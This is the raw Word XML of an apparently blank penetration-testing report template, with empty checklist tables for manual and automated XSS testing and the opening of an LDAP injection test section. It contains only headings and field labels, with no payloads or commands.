              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Manual Test for XSS Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="147E725C" w14:textId="2715E93E" w:rsidR="00FC3E47" w:rsidRPr="001344A9" w:rsidRDefault="00FC3E47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051E0B" w:rsidRPr="00051E0B" w14:paraId="744C6BC1" w14:textId="77777777" w:rsidTr="001344A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B3F66E4" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="001344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51E0B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A5B1BF5" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0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51E0B" w:rsidRPr="00051E0B" w14:paraId="71FC8AED" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="422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2CEBE94" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="001344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51E0B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0720A29" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0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51E0B" w:rsidRPr="00051E0B" w14:paraId="78E6F423" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="422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06AA39B" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="001344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51E0B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6132E61" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0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51E0B" w:rsidRPr="00051E0B" w14:paraId="04ACE342" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="422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F30D132" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="001344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51E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>URLs/Queries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ED651BE" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="168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F0AB30D" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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883C912" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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2C59F16" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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2751065" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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002C0D9" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0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51E0B" w:rsidRPr="00051E0B" w14:paraId="63D3EB67" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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79704B6" w14:textId="2985868A" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00B800BC" w:rsidP="001344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800BC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>URL Parameter XSS Tested?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779CA875" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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4FF7786E" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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051E0B" w:rsidRPr="00051E0B" w14:paraId="690C0240" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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3FAA748" w14:textId="291470A0" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00B800BC" w:rsidP="001344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color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B800BC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Search Field XSS Tested?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51F05F54" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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0D86021E" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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051E0B" w:rsidRPr="00051E0B" w14:paraId="7AA090D1" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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CBF4ACA" w14:textId="07E84ED0" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00B800BC" w:rsidP="001344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color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B800BC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>User-Agent Header XSS Tested?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21A4CC53" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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4A3F54AF" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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051E0B" w:rsidRPr="00051E0B" w14:paraId="01E13D6C" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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CE09A8F" w14:textId="6987F611" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00AD242C" w:rsidP="001344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color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD242C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Filter Evasion Techniques Used?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4F964ADF" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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53C32EA4" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0B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51E0B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AD242C" w:rsidRPr="00051E0B" w14:paraId="49090C25" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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E13FCAD" w14:textId="3ACE12A2" w:rsidR="00AD242C" w:rsidRPr="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="001344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D242C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>DOM-Based XSS Tested?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7FD14B31" w14:textId="119C37E1" w:rsidR="00AD242C" w:rsidRPr="00051E0B" w:rsidRDefault="00AD242C" w:rsidP="00051E0B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1B3E888B" w14:textId="11832D3B" w:rsidR="00AD242C" w:rsidRPr="00051E0B" w:rsidRDefault="00AD242C" w:rsidP="00051E0B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AD242C" w:rsidRPr="00051E0B" w14:paraId="33774CB5" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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7230AEA" w14:textId="0D3D2787" w:rsidR="00AD242C" w:rsidRPr="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="001344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D242C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Event Handler XSS Exploited?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36667120" w14:textId="6D7B1B34" w:rsidR="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="00051E0B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130EA25C" w14:textId="007D9457" w:rsidR="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="00051E0B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AD242C" w:rsidRPr="00051E0B" w14:paraId="2CA817D8" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="782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0D4B8F6" w14:textId="7FEF0A76" w:rsidR="00AD242C" w:rsidRPr="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="001344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D242C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Unauthorized Access or Data Theft via XSS?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2BC8B1D3" w14:textId="440B4448" w:rsidR="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="00051E0B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4D5ABA40" w14:textId="712F8A7A" w:rsidR="00AD242C" w:rsidRDefault="00AD242C" w:rsidP="00051E0B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051E0B" w:rsidRPr="00051E0B" w14:paraId="33915B0C" w14:textId="77777777" w:rsidTr="001344A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8FE04AB" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="001344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51E0B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List of XSS Vulnerabilities detected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405E2F4" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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0E0520D" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="166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8B8AB64" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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BD4F169" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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33E2EAB" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0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A010E" w:rsidRPr="00051E0B" w14:paraId="5EBEFE2F" w14:textId="77777777" w:rsidTr="001344A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6D778C6" w14:textId="18310784" w:rsidR="000A010E" w:rsidRPr="00051E0B" w:rsidRDefault="000A010E" w:rsidP="001344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Evidence Collected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605AB65" w14:textId="77777777" w:rsidR="000A010E" w:rsidRDefault="000A010E" w:rsidP="000A010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9F02761" w14:textId="77777777" w:rsidR="000A010E" w:rsidRDefault="000A010E" w:rsidP="000A010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D69AC99" w14:textId="77777777" w:rsidR="000A010E" w:rsidRDefault="000A010E" w:rsidP="000A010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57DC4B5" w14:textId="77777777" w:rsidR="001344A9" w:rsidRDefault="001344A9" w:rsidP="000A010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340F9E1" w14:textId="77777777" w:rsidR="001344A9" w:rsidRPr="00051E0B" w:rsidRDefault="001344A9" w:rsidP="000A010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51E0B" w:rsidRPr="00051E0B" w14:paraId="5204EDD4" w14:textId="77777777" w:rsidTr="001344A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A5E97D3" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="001344A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51E0B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9F369E5" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="167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A3253C8" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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7C4CE1D" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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423F9AF" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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32EB5E6" w14:textId="77777777" w:rsidR="00051E0B" w:rsidRPr="00051E0B" w:rsidRDefault="00051E0B" w:rsidP="00051E0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25C65685" w14:textId="77777777" w:rsidR="000A010E" w:rsidRDefault="000A010E" w:rsidP="000A010E">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F201F6" w14:textId="77777777" w:rsidR="000A010E" w:rsidRPr="00B07F1E" w:rsidRDefault="000A010E" w:rsidP="000A010E">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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010E" w:rsidRPr="005D2C80" w14:paraId="32B6F973" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13420573" w14:textId="77777777" w:rsidR="000A010E" w:rsidRPr="005D2C80" w:rsidRDefault="000A010E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66D7C067" w14:textId="77777777" w:rsidR="000A010E" w:rsidRPr="005D2C80" w:rsidRDefault="000A010E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DFD0F06" w14:textId="77777777" w:rsidR="000A010E" w:rsidRDefault="000A010E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="703650B0" w14:textId="77777777" w:rsidR="000A010E" w:rsidRDefault="000A010E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EC26559" w14:textId="77777777" w:rsidR="000A010E" w:rsidRPr="005D2C80" w:rsidRDefault="000A010E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AB2C074" w14:textId="77777777" w:rsidR="00FC3E47" w:rsidRDefault="00FC3E47" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0C6747" w14:textId="77777777" w:rsidR="00724286" w:rsidRDefault="00724286" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A010E" w:rsidRPr="00A51A96" w14:paraId="61472628" w14:textId="77777777" w:rsidTr="00D14370">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6D6BF29B" w14:textId="4394EE5F" w:rsidR="000A010E" w:rsidRPr="003C713F" w:rsidRDefault="000A010E" w:rsidP="00972D9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8.2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172902" w:rsidRPr="00172902">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Automated Test for XSS Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B051D62" w14:textId="77777777" w:rsidR="000A010E" w:rsidRPr="00D14370" w:rsidRDefault="000A010E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55"/>
        <w:gridCol w:w="3202"/>
        <w:gridCol w:w="3503"/>
      </w:tblGrid>
      <w:tr w:rsidR="00172902" w:rsidRPr="00172902" w14:paraId="4FC821E4" w14:textId="77777777" w:rsidTr="00D14370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A59D750" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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72902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43A5EED4" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="0017290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72902" w:rsidRPr="00172902" w14:paraId="67C03F28" w14:textId="77777777" w:rsidTr="00D14370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4BC910BA" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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72902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7B9394CC" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="0017290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72902" w:rsidRPr="00172902" w14:paraId="65BD704A" w14:textId="77777777" w:rsidTr="00D14370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543D4D8" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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72902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5C254BD7" w14:textId="77777777" w:rsidR="00172902" w:rsidRDefault="00172902" w:rsidP="0017290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6495137" w14:textId="77777777" w:rsidR="00536499" w:rsidRPr="00172902" w:rsidRDefault="00536499" w:rsidP="0017290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72902" w:rsidRPr="00172902" w14:paraId="2C0D0C25" w14:textId="77777777" w:rsidTr="00D14370">
        <w:trPr>
          <w:trHeight w:val="1313"/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2F89A166" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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72902">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used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047A8609" w14:textId="77777777" w:rsidR="00172902" w:rsidRDefault="00172902" w:rsidP="0017290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6E551CC" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="0017290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8CB624B" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="0017290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F1FBA63" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="0017290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E33D6E0" w14:textId="77777777" w:rsidR="00D14370" w:rsidRDefault="00D14370" w:rsidP="0017290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E0189B7" w14:textId="77777777" w:rsidR="00536499" w:rsidRPr="00172902" w:rsidRDefault="00536499" w:rsidP="0017290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72902" w:rsidRPr="00172902" w14:paraId="62B1CBB3" w14:textId="77777777" w:rsidTr="00D14370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0B97B90B" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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72902">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Is Automated Test for XSS Vulnerabilities Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3202" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56A2870E" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00172902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172902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3423F66F" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00172902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172902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172902" w:rsidRPr="00172902" w14:paraId="5130451A" w14:textId="77777777" w:rsidTr="00D14370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9E087E3" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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172902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List of XSS Vulnerabilities Detected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15CA04F5" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="169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22CD74A" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="169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D4BF2C6" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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5AD54F3" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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5A0AF88" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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07AC6FB" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="0017290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A0192" w:rsidRPr="00172902" w14:paraId="086C3E36" w14:textId="77777777" w:rsidTr="00D14370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715C95B9" w14:textId="25C74AA2" w:rsidR="00FA0192" w:rsidRPr="00172902" w:rsidRDefault="00FA0192" w:rsidP="00D1437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FA0192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Evidence Collected</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA0192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ab/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39DF2311" w14:textId="77777777" w:rsidR="00FA0192" w:rsidRDefault="00FA0192" w:rsidP="00FA019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2BBF52A" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="00FA019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6576B0E" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="00FA019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6BE02B2" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="00FA019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A227D19" w14:textId="77777777" w:rsidR="00536499" w:rsidRDefault="00536499" w:rsidP="00FA019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A59DF29" w14:textId="77777777" w:rsidR="00D14370" w:rsidRDefault="00D14370" w:rsidP="00FA019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7E8C8CE" w14:textId="77777777" w:rsidR="00D14370" w:rsidRPr="00172902" w:rsidRDefault="00D14370" w:rsidP="00FA019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72902" w:rsidRPr="00172902" w14:paraId="2136F753" w14:textId="77777777" w:rsidTr="00D14370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43D7DFF2" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="00D1437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72902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4BB71729" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="170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A006E57" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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D95CF68" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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7428D6A" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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F380408" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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2FF8FA9" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="00172902" w:rsidRDefault="00172902" w:rsidP="0017290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4843D267" w14:textId="77777777" w:rsidR="00002A22" w:rsidRDefault="00002A22" w:rsidP="00002A22">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Hlk189473373"/>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB9727" w14:textId="77777777" w:rsidR="00002A22" w:rsidRPr="00B07F1E" w:rsidRDefault="00002A22" w:rsidP="00002A22">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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02A22" w:rsidRPr="005D2C80" w14:paraId="5D3CC076" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="251295ED" w14:textId="77777777" w:rsidR="00002A22" w:rsidRPr="005D2C80" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="550E6828" w14:textId="77777777" w:rsidR="00002A22" w:rsidRPr="005D2C80" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24BEB62D" w14:textId="77777777" w:rsidR="00002A22" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="435FA88D" w14:textId="77777777" w:rsidR="00002A22" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CF1DC58" w14:textId="77777777" w:rsidR="00002A22" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D714192" w14:textId="77777777" w:rsidR="00002A22" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47D1F8A6" w14:textId="77777777" w:rsidR="00002A22" w:rsidRPr="005D2C80" w:rsidRDefault="00002A22" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="10"/>
    </w:tbl>
    <w:p w14:paraId="10D9D35A" w14:textId="44422D05" w:rsidR="00002A22" w:rsidRDefault="00002A22" w:rsidP="00724286">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00574843" w:rsidRPr="00A51A96" w14:paraId="599421F5" w14:textId="77777777" w:rsidTr="007B478C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3E5B8F45" w14:textId="48A8CBAF" w:rsidR="00574843" w:rsidRPr="003C713F" w:rsidRDefault="00574843" w:rsidP="00972D9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8.3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574843">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for LDAP Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7893416F" w14:textId="77777777" w:rsidR="00172902" w:rsidRPr="007B478C" w:rsidRDefault="00172902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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w14:paraId="2AF32572" w14:textId="77777777" w:rsidTr="007B478C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2E0DE050" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="007B478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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
